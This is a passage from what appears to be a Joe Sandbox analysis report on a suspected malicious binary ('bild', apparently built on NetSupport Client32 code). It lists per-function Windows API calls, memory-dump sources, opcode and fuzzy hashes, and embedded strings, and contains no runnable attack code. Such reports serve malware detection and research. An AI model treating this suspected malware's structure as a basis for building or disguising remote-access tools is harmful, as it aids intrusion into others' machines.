                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLock
                                                                                                      • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                      • API String ID: 2752051264-327499879
                                                                                                      • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                      • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                                      • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                      • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                      • _strrchr.LIBCMT ref: 1114315A
                                                                                                      • _strrchr.LIBCMT ref: 1114316A
                                                                                                      • wsprintfA.USER32 ref: 11143185
                                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                      • String ID: BILD
                                                                                                      • API String ID: 2529650285-1114602597
                                                                                                      • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                      • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                                      • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                      • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                                      APIs
                                                                                                      • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                                      • _memmove.LIBCMT ref: 110653B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ProfileString_memmove
                                                                                                      • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                      • API String ID: 1665476579-2460060945
                                                                                                      • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                      • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                                      • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                      • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3719176846-0
                                                                                                      • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                      • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                                      • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                      • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3719176846-0
                                                                                                      • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                      • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                                      • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                      • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                                      APIs
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                                      • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                                      • TranslateMessage.USER32(?), ref: 1102543A
                                                                                                      • DispatchMessageA.USER32(?), ref: 11025444
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchItemTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1381171329-0
                                                                                                      • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                      • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                                      • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                      • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf$VisibleWindow
                                                                                                      • String ID: %d,%d,%d,%d,%d,%d
                                                                                                      • API String ID: 1671172596-1913222166
                                                                                                      • Opcode ID: 8791ca63a79dced235f4e3776a7ea81ab1c93e4dd005f09928dbe6592e314a28
                                                                                                      • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                                      • Opcode Fuzzy Hash: 8791ca63a79dced235f4e3776a7ea81ab1c93e4dd005f09928dbe6592e314a28
                                                                                                      • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$DeleteObject
                                                                                                      • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                                      • API String ID: 3011517232-3209293507
                                                                                                      • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                      • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                                      • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                      • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                                      APIs
                                                                                                      • _memmove.LIBCMT ref: 110D1128
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                      • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                      • API String ID: 1528188558-323366856
                                                                                                      • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                      • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                                      • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                      • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                                      APIs
                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                                      • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                      • String ID: Max
                                                                                                      • API String ID: 1521622399-2772132969
                                                                                                      • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                      • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                                      • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                      • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                                      APIs
                                                                                                      • IsWindow.USER32(?), ref: 110ED118
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                      • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                      • API String ID: 2577986331-1331251348
                                                                                                      • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                      • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                                      • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                      • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 11081417
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
